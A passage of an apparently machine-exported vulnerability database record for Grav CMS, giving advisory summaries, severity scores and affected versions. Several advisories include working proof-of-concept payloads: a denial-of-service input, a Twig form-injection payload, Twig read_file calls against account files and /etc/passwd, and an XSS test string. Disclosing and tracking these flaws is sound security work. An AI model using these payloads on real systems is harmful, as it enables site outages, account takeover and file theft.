fails to properly validate user input. If a malformed value is inserted—such as a single forward slash (`/`) or an XSS test string—it causes a fatal regular expression parsing error on the server.\n\nThis leads to application-wide failure due to the use of the `preg_match()` function with an **improperly constructed regular expression**, resulting in the following error:\n\n`preg_match(): Unknown modifier 'o' File: /system/src/Grav/Common/Language/Language.php line 244`\n\nOnce triggered, the site becomes completely unavailable to all users.\n\n---\n\n## Details\n\n- **Vulnerable Endpoint**: `POST /admin/config/system`\n \n- **Submenu**: `Languages`\n \n- **Parameter**: `Supported` \n \n\nThe application dynamically constructs a regular expression using the contents of the `Supported` field without escaping the input using `preg_quote()` or proper validation. This allows attackers to inject invalid syntax into the regex engine, crashing the application during language resolution.\n\n**Stack trace excerpt**:\n\n`Whoops \\ Exception \\ ErrorException (E_WARNING) preg_match(): Unknown modifier 'o' /system/src/Grav/Common/Language/Language.php244`\n\n---\n\n## Proof of Concept (PoC)\n\n### Payloads:\n\n`/ `\n\n### Steps to Reproduce:\n\n1. Log into the Grav Admin Panel.\n \n2. Navigate to: **Configuration** → **System** → **Languages**.\n \n3. Locate the `Supported` field.\n \n4. Insert one of the payloads above (e.g., a single slash `/`).\n \n5. Click **Save**.\n\n<img width=\"1897\" height=\"639\" alt=\"Pasted image 20250719183223\" src=\"https://github.com/user-attachments/assets/d3a54a20-d30d-46c6-9015-722f80701cfb\" />\n\n1. Observe: All pages in the application begin throwing a fatal error and become inaccessible.\n\n<img width=\"1802\" height=\"998\" alt=\"Pasted image 20250719175229\" src=\"https://github.com/user-attachments/assets/b16750c2-507f-4c30-a9bb-d07fa92bb777\" />\n\n---\n\n## Impact\n\n- Application-wide Denial of Service (DoS)\n \n- All login and admin views crash with the same error\n \n- Potentially exploitable by:\n \n - Admin panel users\n \n - CSRF if misconfigured \n \n\n---\n\n## References\n\n- **CWE-1333**: Improper Regular Expression\n \n- **CWE-20**: Improper Input Validation\n\n\n## Discoverer\n\n[Marcelo Queiroz](www.linkedin.com/in/marceloqueirozjr) \n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66305","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20431","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66305"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:14:17Z/"}],"url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:14:17Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66305","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66305"},{"reference_url":"https://github.com/advisories/GHSA-m8vh-v6r6-w7p6","reference_id":"GHSA-m8vh-v6r6-w7p6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m8vh-v6r6-w7p6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66305","GHSA-m8vh-v6r6-w7p6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bdnj-twfh-subp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30102?format=json","vulnerability_id":"VCID-bttg-w7fp-ybd2","summary":"Grav has Broken Access Control which allows an Editor to modify the page's YAML Frontmatter to alter form processing actions\n### Summary\nDue to a broken access control vulnerability in the `/admin/pages/{page_name}` endpoint, an editor ( user with full permissions to pages ) can change the functionality of a form after submission.\n\n### Details\nDue to improper authorization checks when modifying critical fields on a POST request to `/admin/pages/{page_name}`, an editor with only permissions to change basic content on the form is now able to change the functioning of the form through modifying the content of the `data[_json][header][form]` which is the YAML frontmatter which includes the `process` section which dictates what happens after a user submits the form which include some important actions that could lead to further vulnerabilities.\n\n### PoC\n\n- Have Admin and Form plugins installed\n- Connect to panel as admin, create user and give him permission for pages all\n- Now connect as that user and notice you cant edit any process field in the panel\n- Change anything in the content of the form and save\n- Intercept the request:\n\n\n- Now modify the field `data[_json][header][form] with the following payload URL-encoded not like this:\n```\n{\"name\":\"ssti-test 2\",\"fields\":{\"name\":{\"type\":\"text\",\"label\":\"Name\",\"required\":true}},\"buttons\":{\"submit\":{\"type\":\"submit\",\"value\":\"Submit\"}},\"process\":[{\"message\":\"{{ evaluate_twig(form.value('name')) }}\"}]}\n```\n\n- Change the field and forward it:\n\n\nRequest goes through and changes have been made to the form.\n\n\n### Impact\n\n- Attacker can modify submission logic of the form which leads to changing redirect value, email sending, changing template, breaking out of the Twig sandbox potentially executing code...\n\n### Fix recommendation\n\n- Implement proper authorization checks to such requests especially when it contains fields user shouldn't be able to modify based on his role.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66301","reference_id":"","reference_type":"","scores":[{"value":"0.29124","scoring_system":"epss","scoring_elements":"0.96666","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66301"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T16:26:05Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66301","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66301"},{"reference_url":"https://github.com/advisories/GHSA-v8x2-fjv7-8hjh","reference_id":"GHSA-v8x2-fjv7-8hjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v8x2-fjv7-8hjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66301","GHSA-v8x2-fjv7-8hjh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bttg-w7fp-ybd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29383?format=json","vulnerability_id":"VCID-dmbe-mmj8-3baa","summary":"Grav Cross-site Scripting vulnerability\nA cross-site scripting (XSS) vulnerability in Grav v1.7.45 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-35498","reference_id":"","reference_type":"","scores":[{"value":"0.00152","scoring_system":"epss","scoring_elements":"0.35601","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-35498"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/r4vanan/Stored-xss-Grav-v1.7.45","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T15:42:33Z/"}],"url":"https://github.com/r4vanan/Stored-xss-Grav-v1.7.45"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-35498","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-35498"},{"reference_url":"https://r4vanan.medium.com/a-quick-dive-into-xss-vulnerability-in-grav-cms-v1-7-45-cve-2024-35498-fc236b7d74a0","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T15:42:33Z/"}],"url":"https://r4vanan.medium.com/a-quick-dive-into-xss-vulnerability-in-grav-cms-v1-7-45-cve-2024-35498-fc236b7d74a0"},{"reference_url":"https://github.com/advisories/GHSA-m78c-qx99-mvw9","reference_id":"GHSA-m78c-qx99-mvw9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-m78c-qx99-mvw9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/44327?format=json","purl":"pkg:composer/getgrav/grav@1.7.46","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.46"}],"aliases":["CVE-2024-35498","GHSA-m78c-qx99-mvw9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dmbe-mmj8-3baa"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14905?format=json","vulnerability_id":"VCID-dmh7-xvmg-27ef","summary":"Grav Vulnerable to Arbitrary File Read to Account Takeover\n### Summary\nA low privilege user account with page edit privilege can read any server files using Twig Syntax. This includes Grav user account files - /grav/user/accounts/*.yaml. This file stores hashed user password, 2FA secret, and the password reset token. This can allow an adversary to compromise any registered account by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password.\n\n### Proof Of Concept\n`{{ read_file('/var/www/html/grav/user/accounts/riri.yaml') }}`\n\nUse the above Twig template syntax in a page and observe that the administrator riri's authentication details are exposed accessible by any unauthenticated user. \n\n\n\nAs an additional proof of concept for reading system files, observe the `/etc/passwd` file read using the following Twig syntax:\n`{{ read_file('/etc/passwd') }}`\n\n\n\n### Impact\nThis can allow a low privileged user to perform a full account takeover of other registered users including Adminsitrators. This can also allow an adversary to read any file in the web server.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34082","reference_id":"","reference_type":"","scores":[{"value":"0.00211","scoring_system":"epss","scoring_elements":"0.43599","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34082"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/b6bba9eb99bf8cb55b8fa8d23f18873ca594e348","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-15T19:34:23Z/"}],"url":"https://github.com/getgrav/grav/commit/b6bba9eb99bf8cb55b8fa8d23f18873ca594e348"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-15T19:34:23Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34082","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34082"},{"reference_url":"https://github.com/advisories/GHSA-f8v5-jmfh-pr69","reference_id":"GHSA-f8v5-jmfh-pr69","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f8v5-jmfh-pr69"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/44327?format=json","purl":"pkg:composer/getgrav/grav@1.7.46","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.46"}],"aliases":["CVE-2024-34082","GHSA-f8v5-jmfh-pr69"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dmh7-xvmg-27ef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30317?format=json","vulnerability_id":"VCID-dzhh-3xxa-1ycf","summary":"Grav vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/pages/[page]` parameter `data[header][template]` in Advanced Tab\n## Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][template]` parameter. The script is saved within the page's frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `POST /admin/pages/[page]` \n**Parameter:** `data[header][template]`\n\nThe application fails to properly sanitize user input in the `data[header][template]` field, which is stored in the YAML frontmatter of the page. An attacker can inject JavaScript code using this field, and the payload is rendered and executed when the page is accessed, especially within the Admin Panel interface.\n\n---\n\n## PoC\n\n**Payload:**\n\n`<script>alert('PoC-XXS73')</script>`\n\n### Steps to Reproduce:\n\n1. Log in to the _Grav_ Admin Panel and navigate to **Pages**.\n \n2. Create a new page or edit an existing one.\n \n3. In the **Advanced > Template** field (which maps to `data[header][template]`), insert the payload:\n\n\n4. Save the page.\n \n5. Return to the **Pages** section and click on the **three-dot menu** of the affected page: \n\n\n6. The stored XSS payload is triggered, and the script is executed in the browser:\n\n---\n\n## Impact\n\nStored XSS vulnerabilities can have serious consequences, including:\n\n- **Session hijacking:** Capturing admin session cookies or tokens\n \n- **Malware delivery:** Executing scripts that load malicious resources\n \n- **Credential theft:** Creating fake login prompts to steal usernames/passwords\n \n- **Data exposure:** Reading sensitive metadata or page contents\n \n- **Privilege escalation:** Performing actions as an authenticated user\n \n- **Website defacement:** Altering visual or functional elements of the site\n \n- **Reputation damage:** Undermining user trust in the application\n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66310","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66310"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:03:09Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:03:09Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66310","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66310"},{"reference_url":"https://github.com/advisories/GHSA-7g78-5g5g-mvfj","reference_id":"GHSA-7g78-5g5g-mvfj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7g78-5g5g-mvfj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66310","GHSA-7g78-5g5g-mvfj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dzhh-3xxa-1ycf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30198?format=json","vulnerability_id":"VCID-euf5-wt5v-fqaf","summary":"Grav is vulnerable to Stored XSS through authenticated user-edited content\ngrav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66843","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.0782","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66843"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/Yohane-Mashiro/grav_cve/issues/1","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-16T17:33:18Z/"}],"url":"https://github.com/Yohane-Mashiro/grav_cve/issues/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66843","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66843"},{"reference_url":"https://github.com/advisories/GHSA-mh85-44c2-3m97","reference_id":"GHSA-mh85-44c2-3m97","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mh85-44c2-3m97"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/872248?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.1"}],"aliases":["CVE-2025-66843","GHSA-mh85-44c2-3m97"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-euf5-wt5v-fqaf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29930?format=json","vulnerability_id":"VCID-f8zy-fcfc-tfdc","summary":"Grav Admin Plugin vulnerable to User Enumeration & Email Disclosure\n# Grav v1.7.49.5 / Admin v1.10.49.1 – User Enumeration & Email Disclosure\n\n### Summary\nA **user enumeration and email disclosure vulnerability** exists in Grav **v1.7.49.5** with Admin plugin **v1.10.49.1**. \nThe \"Forgot Password\" functionality at `/admin/forgot` leaks information about valid usernames and their associated email addresses through distinct server responses. \nThis allows an attacker to 